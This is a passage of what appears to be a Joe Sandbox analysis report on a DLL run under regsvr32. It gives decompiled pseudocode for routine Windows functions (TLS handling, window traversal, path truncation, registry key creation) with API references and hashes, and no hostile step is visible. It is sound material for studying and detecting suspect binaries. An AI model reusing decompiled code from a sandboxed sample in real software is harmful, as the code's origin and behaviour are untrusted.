                                                                        							goto L10;
                                                                        						} else {
                                                                        							_t52 = _a4;
                                                                        							if(_t52 >=  *(_t64 + 8) && _a8 != 0) {
                                                                        								L10:
                                                                        								_t36 =  *(_t64 + 0xc);
                                                                        								if(_t36 != 0) {
                                                                        									_t16 =  &(_t59[3]); // 0x3
                                                                        									_t49 =  *_t16 << 2;
                                                                        									_t37 = LocalReAlloc(_t36,  *_t16 << 2, 2);
                                                                        								} else {
                                                                        									_t15 =  &(_t59[3]); // 0x3
                                                                        									_t37 = LocalAlloc(0,  *_t15 << 2);
                                                                        								}
                                                                        								if(_t37 == 0) {
                                                                        									LeaveCriticalSection(_v8);
                                                                        									_t37 = E1001CE3B(_t49);
                                                                        								}
                                                                        								 *(_t64 + 0xc) = _t37;
                                                                        								_t20 =  &(_t59[3]); // 0x3
                                                                        								E10011C50(_t37 +  *(_t64 + 8) * 4, 0,  *_t20 -  *(_t64 + 8) << 2);
                                                                        								_t23 =  &(_t59[3]); // 0x3
                                                                        								 *(_t64 + 8) =  *_t23;
                                                                        								TlsSetValue( *_t59, _t64);
                                                                        								_t52 = _a4;
                                                                        							}
                                                                        						}
                                                                        						_t32 =  *(_t64 + 0xc);
                                                                        						if(_t32 != 0 && _t52 <  *(_t64 + 8)) {
                                                                        							 *((intOrPtr*)(_t32 + _t52 * 4)) = _a8;
                                                                        						}
                                                                        						LeaveCriticalSection(_v8);
                                                                        					}
                                                                        				}
                                                                        				return _t32;
                                                                        			}













                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(1004F010,00000000,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037742
                                                                        • TlsGetValue.KERNEL32(1004EFF4,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037760
                                                                        • LocalAlloc.KERNEL32(00000000,00000003,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD), ref: 100377BC
                                                                        • LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4), ref: 100377CE
                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 100377DB
                                                                        • TlsSetValue.KERNEL32(1004EFF4,00000000), ref: 1003780B
                                                                        • LeaveCriticalSection.KERNEL32(1004F010,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 1003782C
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                        • String ID:
                                                                        • API String ID: 784703316-0
                                                                        • Opcode ID: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                        • Instruction ID: 1d31c533a979c77301d76d8eb0d2db078f0d9c8120d6b2d843174624ed3e927a
                                                                        • Opcode Fuzzy Hash: 08160d687b4238578b6b11cb7633d7b3c48d72cf3f7efa0c267663df606f3a02
                                                                        • Instruction Fuzzy Hash: F8317C75600615AFD726DF59C8C8C5ABBE5FF08352B11C929E81ADB611CB30FC50CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E1000F6EA(void* __ebx, void* __ecx) {
                                                                        				void* __ebp;
                                                                        				void* _t28;
                                                                        				void* _t36;
                                                                        				signed char _t37;
                                                                        				intOrPtr _t41;
                                                                        				void* _t42;
                                                                        				void* _t44;
                                                                        				intOrPtr _t45;
                                                                        				void* _t46;
                                                                        
                                                                        				_t39 = __ecx;
                                                                        				_t36 = __ebx;
                                                                        				_t41 =  *((intOrPtr*)(_t46 + 0x10));
                                                                        				if(_t41 == 0) {
                                                                        					_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                                        					L14:
                                                                        					_t42 = E100220EE(_t45, GetTopWindow( *(_t45 + 0x1c)));
                                                                        					if(_t42 != 0) {
                                                                        						L7:
                                                                        						if((GetWindowLongA( *(_t42 + 0x1c), 0xffffffec) & 0x00010000) == 0) {
                                                                        							L18:
                                                                        							return _t42;
                                                                        						}
                                                                        						_push(_t36);
                                                                        						_t37 =  *(_t46 + 0x1c);
                                                                        						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x1c)) != 0) {
                                                                        							if((_t37 & 0x00000002) == 0) {
                                                                        								L16:
                                                                        								_push(_t37);
                                                                        								_push(0);
                                                                        								_push(_t42);
                                                                        								goto L17;
                                                                        							}
                                                                        							_t39 = _t42;
                                                                        							if(E100203CE(_t42) != 0) {
                                                                        								goto L16;
                                                                        							}
                                                                        							goto L12;
                                                                        						} else {
                                                                        							L12:
                                                                        							_push(_t37);
                                                                        							_push(_t42);
                                                                        							_push(_t45);
                                                                        							L17:
                                                                        							_t42 = E1000F6EA(_t37, _t39);
                                                                        							goto L18;
                                                                        						}
                                                                        					}
                                                                        					return _t45;
                                                                        				}
                                                                        				_t28 = E100220EE(_t44, GetWindow( *(_t41 + 0x1c), 2));
                                                                        				_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                                        				while(_t28 == 0) {
                                                                        					_t41 = E1000F695(_t45, E100220EE(_t45, GetParent( *(_t41 + 0x1c))));
                                                                        					if(_t41 == 0 || _t41 == _t45) {
                                                                        						goto L14;
                                                                        					} else {
                                                                        						_t28 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
                                                                        						continue;
                                                                        					}
                                                                        				}
                                                                        				_t42 = E100220EE(_t45, GetWindow( *(_t41 + 0x1c), 2));
                                                                        				goto L7;
                                                                        			}













                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$LongParentVisible
                                                                        • String ID:
                                                                        • API String ID: 506644340-0
                                                                        • Opcode ID: 9cb7d17d8843fda3976b61edc90904ffaa5e1937fc9ca20ed80e1097fbab1199
                                                                        • Instruction ID: 9ff0abfdc9ec089c08616602c8c252ca1eec58daf7253e76d9435a222983167d
                                                                        • Opcode Fuzzy Hash: 9cb7d17d8843fda3976b61edc90904ffaa5e1937fc9ca20ed80e1097fbab1199
                                                                        • Instruction Fuzzy Hash: 2B21C1366087286FE732EEA19C49F2B769CEF406D0F02491CF845E7596C760EC01D791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E10024AA1(void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				intOrPtr _v8;
                                                                        				CHAR* _t21;
                                                                        				CHAR* _t22;
                                                                        				int _t31;
                                                                        				CHAR* _t33;
                                                                        				intOrPtr _t35;
                                                                        				CHAR* _t40;
                                                                        				void* _t44;
                                                                        				void* _t47;
                                                                        
                                                                        				_t40 = _a4;
                                                                        				_t31 = lstrlenA(_t40);
                                                                        				_t21 = E10038481(_t40, 0, 0) - 1;
                                                                        				_t44 = _t31 - _t21;
                                                                        				_t35 = _t44 + _t40;
                                                                        				_a4 = _t21;
                                                                        				_v8 = _t35;
                                                                        				if(_a8 < _t31) {
                                                                        					if(_a8 >= _t21) {
                                                                        						_t33 =  &(_t40[2]);
                                                                        						if( *_t40 == 0x5c && _t40[1] == 0x5c) {
                                                                        							while( *_t33 != 0x5c) {
                                                                        								_t33 = E100127D1(_t33);
                                                                        							}
                                                                        						}
                                                                        						if(_t44 > 3) {
                                                                        							do {
                                                                        								_t33 = E100127D1(_t33);
                                                                        							} while ( *_t33 != 0x5c);
                                                                        						}
                                                                        						_t22 = _a4;
                                                                        						_t47 = _t33 - _t40;
                                                                        						_t12 =  &(_t22[5]); // 0x5
                                                                        						if(_a8 >= _t47 + _t12) {
                                                                        							while(lstrlenA(_t33) + _t47 + 4 > _a8) {
                                                                        								do {
                                                                        									_t33 = E100127D1(_t33);
                                                                        								} while ( *_t33 != 0x5c);
                                                                        							}
                                                                        							 *((char*)(_t47 + _t40)) = 0;
                                                                        							lstrcatA(_t40, "\\...");
                                                                        							_t21 = lstrcatA(_t40, _t33);
                                                                        						} else {
                                                                        							_push(_v8);
                                                                        							goto L14;
                                                                        						}
                                                                        					} else {
                                                                        						if(_a12 == 0) {
                                                                        							_t35 = 0x1003da51;
                                                                        						}
                                                                        						_push(_t35);
                                                                        						L14:
                                                                        						_t21 = lstrcpyA(_t40, ??);
                                                                        					}
                                                                        				}
                                                                        				return _t21;
                                                                        			}













                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                          • Part of subcall function 10038481: PathFindFileNameA.SHLWAPI(?,10024ABE,?,00000000,00000000), ref: 10038485
                                                                          • Part of subcall function 10038481: lstrlenA.KERNEL32(00000000), ref: 10038493
                                                                        • lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                        • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 10024B44
                                                                        • lstrcatA.KERNEL32(?,\...), ref: 10024B63
                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 10024B67
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcat$FileFindNamePathlstrcpy
                                                                        • String ID: \...
                                                                        • API String ID: 1604900594-1167917071
                                                                        • Opcode ID: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                        • Instruction ID: ad9d98bbfb168da91c5fc0e9dd0c54a6fb05e1c2565fcdf0eb8a60c119eae97e
                                                                        • Opcode Fuzzy Hash: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
                                                                        • Instruction Fuzzy Hash: 7D21E57590075AAEEB22CB70ACC4F5B7BF8DB05296F52805EE9059B042EB74E940CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 61%
                                                                        			E100304C6(void* __ecx) {
                                                                        				struct tagMSG _v28;
                                                                        				void* __ebp;
                                                                        				int _t21;
                                                                        				intOrPtr _t24;
                                                                        				intOrPtr _t33;
                                                                        				void* _t38;
                                                                        				void* _t39;
                                                                        				int _t40;
                                                                        
                                                                        				_push(0);
                                                                        				_t39 = __ecx;
                                                                        				_t40 = 0xf;
                                                                        				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
                                                                        					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
                                                                        					if(_t21 != 0) {
                                                                        						DispatchMessageA( &_v28);
                                                                        						_push(0);
                                                                        						continue;
                                                                        					}
                                                                        					return _t21;
                                                                        				}
                                                                        				_t24 =  *((intOrPtr*)(_t39 + 0x68));
                                                                        				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x80));
                                                                        				 *(_t39 + 0x78) =  *(_t24 + 0x7c) & 0x0000f000;
                                                                        				SetRectEmpty(_t39 + 0xc);
                                                                        				 *((intOrPtr*)(_t39 + 0x20)) = 0;
                                                                        				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
                                                                        				 *((intOrPtr*)(_t39 + 0x24)) = 0;
                                                                        				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
                                                                        				 *((intOrPtr*)(_t39 + 0x80)) = 0;
                                                                        				_t38 = E100220EE(_t40, GetDesktopWindow());
                                                                        				if(LockWindowUpdate( *(_t38 + 0x1c)) == 0) {
                                                                        					_push(3);
                                                                        				} else {
                                                                        					_push(0x403);
                                                                        				}
                                                                        				_push(GetDCEx( *(_t38 + 0x1c), 0, ??));
                                                                        				_t33 = E10029068();
                                                                        				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
                                                                        				return _t33;
                                                                        			}












                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                        • String ID:
                                                                        • API String ID: 1192691108-0
                                                                        • Opcode ID: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                        • Instruction ID: 8a91eee366d4ec1ad94f649a4fc85a3a9efab89b356857822c8a99d212f9e85e
                                                                        • Opcode Fuzzy Hash: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
                                                                        • Instruction Fuzzy Hash: 39215EB2500B09AFE311DF66DC84E57BBECFB04251F41492EF655CA511D735E9448F60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100358C8(intOrPtr __ecx) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				void* _v16;
                                                                        				int _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _t32;
                                                                        
                                                                        				_t32 = __ecx;
                                                                        				_v24 = __ecx;
                                                                        				_v16 = 0;
                                                                        				_v8 = 0;
                                                                        				_v12 = 0;
                                                                        				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x50), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                                                                        					RegCreateKeyExA(_v12,  *(_v24 + 0x64), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                                                                        				}
                                                                        				if(_v8 != 0) {
                                                                        					RegCloseKey(_v8);
                                                                        				}
                                                                        				if(_v12 != 0) {
                                                                        					RegCloseKey(_v12);
                                                                        				}
                                                                        				return _v16;
                                                                        			}










                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10035945
                                                                        • RegCloseKey.ADVAPI32(?), ref: 1003594F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreate$Open
                                                                        • String ID: software
                                                                        • API String ID: 1740278721-2010147023
                                                                        • Opcode ID: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                        • Instruction ID: f89c3a735d8d1ef68568a63ef4ea0061cb5f0d4f5e3c764e69df4fb83dc90cc3
                                                                        • Opcode Fuzzy Hash: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
                                                                        • Instruction Fuzzy Hash: BF11B37690029DFFDB12DB9ACD88DDFBFBCEF89755F1040AAE500A6121D2719A00DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E10007B50(intOrPtr _a4, intOrPtr* _a8) {
                                                                        				void _v20;
                                                                        				int _t14;
                                                                        				int _t18;
                                                                        				intOrPtr* _t23;
                                                                        
                                                                        				if(E1000799F() == 0) {
                                                                        					if(_a4 != 0x12340042) {
                                                                        						L9:
                                                                        						_t14 = 0;
                                                                        						L10:
                                                                        						return _t14;
                                                                        					}
                                                                        					_t23 = _a8;
                                                                        					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                                                                        						goto L9;
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_t23 + 4)) = 0;
                                                                        						 *((intOrPtr*)(_t23 + 8)) = 0;
                                                                        						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
                                                                        						_t18 = GetSystemMetrics(1);
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						 *(_t23 + 0x10) = _t18;
                                                                        						 *((intOrPtr*)(_t23 + 0x24)) = 1;
                                                                        						if( *_t23 >= 0x48) {
                                                                        							lstrcpynA(_t23 + 0x28, "DISPLAY", 0x20);
                                                                        						}
                                                                        						_t14 = 1;
                                                                        						goto L10;
                                                                        					}
                                                                        				}
                                                                        				return  *0x1004ee08(_a4, _a8);
                                                                        			}








                                                                        APIs
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 10007B8E
                                                                        • GetSystemMetrics.USER32 ref: 10007BA6
                                                                        • GetSystemMetrics.USER32 ref: 10007BAD
                                                                        • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 10007BD3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                        • String ID: B$DISPLAY
                                                                        • API String ID: 2307409384-3316187204
                                                                        • Opcode ID: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                        • Instruction ID: f9e3eb19a9beaf27ca7ac5b5242ad86db65a0bc6b8874f4885458b15db7551ae
                                                                        • Opcode Fuzzy Hash: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                        • Instruction Fuzzy Hash: B6117771A012399FEB12DF658C84B5B7BA8FF05791B118466FD09AE109D374DD40CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 10020D8D
                                                                        • GetWindowRect.USER32 ref: 10020DA8
                                                                        • ScreenToClient.USER32 ref: 10020DBB
                                                                        • ScreenToClient.USER32 ref: 10020DC4
                                                                        • EqualRect.USER32 ref: 10020DCE
                                                                        • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10020DF6
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10020E00
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                        • String ID:
                                                                        • API String ID: 443303494-0
                                                                        • Opcode ID: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                        • Instruction ID: 0a58a577598c21a1846f40493314dc2d021d714bbb101a3e6ae2e9ccd4581a15
                                                                        • Opcode Fuzzy Hash: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                        • Instruction Fuzzy Hash: C1113D7650021AAFDB01DFA5DC84EBBBBBEEF84310B118419F916E7112D770A940CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 100304C6: PeekMessageA.USER32 ref: 10030507
                                                                          • Part of subcall function 100304C6: SetRectEmpty.USER32(?), ref: 10030528
                                                                          • Part of subcall function 100304C6: GetDesktopWindow.USER32 ref: 10030540
                                                                          • Part of subcall function 100304C6: LockWindowUpdate.USER32(?,00000000), ref: 10030551
                                                                          • Part of subcall function 100304C6: GetDCEx.USER32(?,00000000,00000003), ref: 10030568
                                                                          • Part of subcall function 10028B90: GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                          • Part of subcall function 10028B90: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                        • GetWindowRect.USER32 ref: 10030BDC
                                                                          • Part of subcall function 10028BC6: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                          • Part of subcall function 10028BC6: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                        • GetWindowRect.USER32 ref: 10030CA6
                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10030D5E
                                                                          • Part of subcall function 1003033B: OffsetRect.USER32(?,?,?), ref: 10030372
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030704
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003070F
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003071A
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030725
                                                                          • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030A88
                                                                          • Part of subcall function 10030A77: SetCapture.USER32(?), ref: 10030A98
                                                                          • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030AA4
                                                                          • Part of subcall function 10030A77: GetMessageA.USER32 ref: 10030ABE
                                                                          • Part of subcall function 10030A77: DispatchMessageA.USER32 ref: 10030AF0
                                                                          • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030B4E
                                                                        • GetWindowRect.USER32 ref: 10030D79
                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10030E61
                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10030E74
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$OffsetWindow$Capture$InflateMessage$AddressHandleModuleProc$DesktopDispatchEmptyLockPeekUpdate
                                                                        • String ID:
                                                                        • API String ID: 2136250054-0
                                                                        • Opcode ID: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                        • Instruction ID: 4b2599bdc0df74788382724407d7fba24e161278d0237bedf51c9f418cb1fd08
                                                                        • Opcode Fuzzy Hash: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                        • Instruction Fuzzy Hash: E3B14876901618AFCF01CFA4C891DEE7BBAEF4A311F014594FD05AF256D672AE84CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E100134E7(void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v12;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t62;
                                                                        				intOrPtr* _t63;
                                                                        				intOrPtr* _t65;
                                                                        				intOrPtr _t67;
                                                                        				intOrPtr _t68;
                                                                        				void* _t69;
                                                                        				intOrPtr _t71;
                                                                        				void* _t72;
                                                                        				intOrPtr _t74;
                                                                        				char _t75;
                                                                        				intOrPtr _t79;
                                                                        				intOrPtr _t85;
                                                                        				intOrPtr _t86;
                                                                        				intOrPtr _t90;
                                                                        				intOrPtr* _t92;
                                                                        				intOrPtr _t94;
                                                                        				intOrPtr _t101;
                                                                        				intOrPtr _t102;
                                                                        				char _t105;
                                                                        				signed int _t111;
                                                                        				intOrPtr _t113;
                                                                        				intOrPtr _t118;
                                                                        				intOrPtr* _t121;
                                                                        				void* _t127;
                                                                        				intOrPtr _t128;
                                                                        				intOrPtr* _t129;
                                                                        				intOrPtr _t132;
                                                                        				void* _t134;
                                                                        				intOrPtr _t136;
                                                                        				intOrPtr _t138;
                                                                        
                                                                        				_t118 = __edx;
                                                                        				_t121 = _a4;
                                                                        				_t101 =  *((intOrPtr*)(_t121 + 4));
                                                                        				_t62 =  *_t121;
                                                                        				_t132 = _t101;
                                                                        				if(_t132 < 0 || _t132 <= 0 && _t62 < 0) {
                                                                        					L29:
                                                                        					_t63 = 0;
                                                                        					__eflags = 0;
                                                                        					goto L30;
                                                                        				} else {
                                                                        					_t134 = _t101 - 0x1000;
                                                                        					if(_t134 > 0) {
                                                                        						goto L29;
                                                                        					}
                                                                        					if(_t134 < 0) {
                                                                        						L6:
                                                                        						_push(_t127);
                                                                        						E100193FB(_t127, _t135);
                                                                        						_t102 =  *((intOrPtr*)(_t121 + 4));
                                                                        						_t136 = _t102;
                                                                        						_t128 =  *_t121;
                                                                        						if(_t136 < 0 || _t136 <= 0 && _t128 <= 0x3f480) {
                                                                        							_t65 = E10018BEF(_t121);
                                                                        							__eflags =  *0x1004cdec; // 0x1
                                                                        							_t129 = _t65;
                                                                        							if(__eflags == 0) {
                                                                        								L15:
                                                                        								asm("cdq");
                                                                        								_t67 =  *0x1004cde8; // 0x7080
